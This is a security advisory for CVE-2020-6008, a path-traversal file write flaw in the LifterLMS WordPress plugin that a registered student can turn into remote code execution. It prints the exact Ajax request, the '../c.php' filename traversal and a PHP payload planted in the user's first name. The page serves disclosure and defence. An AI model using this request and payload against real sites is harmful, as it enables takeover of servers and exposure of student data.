# CVE-2020-6008
LifterLMS • < 3.37.15 • Arbitrary File Write
Reported on 27-Mar-2020 by [Omri Herscovici](/researcher/Omri Herscovici), [Sagi Tzadik](/researcher/Sagi Tzadik)
CPR-ID: 2148
Upload Date: 04-Aug-20
## Information
The `export_admin_table` function in the `LLMS_AJAX_Handler` class is
vulnerable to File Write leading to RCE on the Wordpress server.
A registered student can send an Ajax request with
`?action=export_admin_table`, when combined with `&handler=Course_Students`,
would call `LLMS_Table_Student_Course`->generate_export_file (in the parent
class).
The `generate_export_file` function opens a file handler to a path controlled
by the user in the `&filename` variable in the Ajax Request.
The following request would create a file named `c.php` in the wordpress
`uploads` folder:
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
action=export_admin_table&lesson_id=485&quiz_id=487&_ajax_nonce=[Get from legitimate request]&post_id=254&handler=Course_Students&filename=../c.php&student=5&course_id=482
(The nonce can be copied from any other legitimate Ajax request)
The file created will contain all students registered to the course mentioned
in `&course_id=`.
The student can see what courses he is listed to, change the course id to his,
and change his own first name in the profile page to be `TEST<?php phpinfo();
/*`.
This would create a file simiar to this one in the file system:
id,"Last Name","First Name",Email,Status,"Enrollment Updated",Completed,Progress,Grade
5,"student one","BBBBB<?php phpinfo(); /*",a@ab.com,Enrolled,"March 26, 2020","March 26, 2020",100%,50%
Since PHP is a forgiving language, simply browsing to the website:
http://example.com/wordpress/wp-content/uploads/c.php,
would execute the PHP code written in the user's first name - affectively
achieving full code excution on the server.
**References:**
<https://research.checkpoint.com/2020/e-learning-platforms-getting-schooled-
multiple-vulnerabilities-in-wordpress-most-popular-learning-management-system-
plugins>
京公网安备 11010502034610号
暂无评论